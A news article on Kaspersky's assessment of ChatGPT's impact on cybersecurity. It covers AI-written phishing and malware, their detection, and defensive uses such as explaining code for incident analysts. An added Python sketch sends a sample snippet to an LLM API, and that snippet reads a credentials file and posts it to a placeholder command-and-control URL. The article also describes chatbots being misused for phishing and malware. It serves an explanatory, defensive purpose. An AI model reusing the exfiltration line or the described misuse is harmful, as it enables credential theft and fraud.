Monitoring the impact of ChatGPT on digital security
Kaspersky has examined how widespread use of the popular artificial intelligence application ChatGPT could change the established rules of the digital security world.
The analysis comes just months after OpenAI introduced ChatGPT, one of its most innovative AI models to date.
The new app can explain complex scientific concepts better than many teachers, compose music, write lyrics, and handle almost any request a user makes.
At its core, ChatGPT is an AI-based language model that generates convincing text that is difficult to distinguish from human writing, which has attracted the attention of cybercriminals looking to apply the technology to phishing. Until now, targeted phishing emails were costly to write by hand, which kept attackers from launching personalized phishing campaigns at scale.
But ChatGPT threatens to change that balance of power radically, because it allows attackers to craft persuasive, personalized phishing emails on an industrial scale.
The app can even mimic a specific person's communication style, producing fake emails so convincing they appear to come from a co-worker, which means the number of successful phishing attacks could rise.
Many users have also discovered that ChatGPT can generate code, including malicious code, meaning an information-stealing tool could be created without any programming knowledge.
Cautious users need not worry, however: a security solution capable of detecting malware written by humans can detect and neutralize its bot-written counterparts just as quickly.
While some analysts worry that ChatGPT could create malware tailored to each individual victim, Kaspersky experts believe such samples would still exhibit malicious behavior that security solutions can detect. Moreover, malware written by the chatbot can contain subtle bugs and logic errors, which means fully automated malware coding has yet to be achieved.
Although ChatGPT can be useful to cybercriminals, those responsible for defending and securing systems can benefit from it too: the tool can already quickly "explain" what a particular piece of code does. This is especially valuable in security operations centers, where perpetually busy analysts must devote a minimum of time to each incident, so any tool that accelerates their work is welcome.
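As a rough illustration of that analyst-assist workflow (not part of Kaspersky's report), the step could be scripted against OpenAI's public API. This is a minimal sketch, assuming the official openai Python package (v1+) is installed and an OPENAI_API_KEY environment variable is set; the model name, prompt wording, and sample snippet are all illustrative assumptions.

```python
# Illustrative sketch only: asks an LLM to summarize what a suspicious
# code snippet does, as a time-saving step during incident triage.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Hypothetical snippet pulled from an incident, shown here as an example.
SUSPICIOUS_SNIPPET = """
import base64, urllib.request
urllib.request.urlopen("http://example.invalid/c2",
    data=base64.b64encode(open("creds.txt", "rb").read()))
"""

response = client.chat.completions.create(
    model="gpt-3.5-turbo",  # assumed model name; substitute as needed
    messages=[
        {"role": "system",
         "content": "You are assisting a SOC analyst. Explain plainly "
                    "what the given code does and flag risky behavior."},
        {"role": "user", "content": SUSPICIOUS_SNIPPET},
    ],
)

# Print the model's plain-language explanation for the analyst to review.
print(response.choices[0].message.content)
```

Any such output would still need an analyst's verification; the sketch only shows how the "explain this code" step might be wired into existing tooling.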
In the future, users are likely to see many specialized products: a reverse-engineering model for better understanding code, a model for solving CTF (capture-the-flag) challenges, a model for hunting security vulnerabilities, and others.
Vladislav Tushkanov, a security expert at Kaspersky, said that although ChatGPT does not perform any malicious actions itself, it can help attackers in various scenarios, such as crafting convincing fraudulent emails.
Tushkanov pointed out that the application is not yet ready to become an autonomous hacking AI, noting that malicious code generated by the neural network will not necessarily work on its own and still needs a skilled specialist to improve and deploy it.
Tushkanov added, "While ChatGPT will not have an immediate impact on the field of digital security today, future generations of AI could."
He also said, "In the next few years, we are likely to see large language models, trained both on natural language and on programming code, being adapted for specialized digital security use cases. These changes could affect a wide range of digital security activities, from threat hunting to incident response. Digital security companies will therefore want to understand the opportunities that the new tools open up, while also understanding how this technology could help cybercriminals."